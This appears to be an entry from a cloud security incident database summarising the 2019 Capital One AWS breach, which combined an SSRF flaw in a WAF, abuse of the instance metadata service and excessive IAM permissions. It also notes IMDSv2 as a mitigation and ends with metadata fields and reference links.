In 2019, Capital One had over 100 million consumer credit applications exfiltrated from their AWS environment. The root cause was a combination of two main factors: first, a Server Side Request Forgery (SSRF) vulnerability in a Web Application Firewall (WAF) named “ModSecurity”, which allowed the hacker to abuse it to relay requests to the instance metadata service (IMDS). Second, the same WAF was assigned excessive IAM permissions, which therefore allowed the attacker to use it to list and read files from private buckets in the cloud environment. The hacker then used this access to exfiltrate millions of data records (nearly 30GB), some of which she uploaded to a GitHub repository. The breach was later attributed to Paige Thompson (AKA “Erratic”). AWS later added support for IMDSv2, which uses session-oriented requests and would therefore have mitigated the impact of the aforementioned SSRF vulnerability in the WAF, since the hacker would have failed to retrieve credentials through it from the IMDS.
Type
Incident
Actors
Pub. date
July 19, 2019
Initial access
Cloud native misconfig
Impact
Data exfiltration
Observed techniques
References
https://nypost.com/2022/06/18/seattle-woman-paige-thompson-convicted-in-massive-capital-one-hack/https://edition.cnn.com/2019/07/29/business/capital-one-data-breach/index.htmlhttps://www.fugue.co/blog/a-technical-analysis-of-the-capital-one-cloud-misconfiguration-breachhttps://www.capitalone.com/digital/facts2019/https://ejj.io/blog/capital-onehttps://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/
Status
Featured
Last edited
Jun 2, 2024 11:53 AM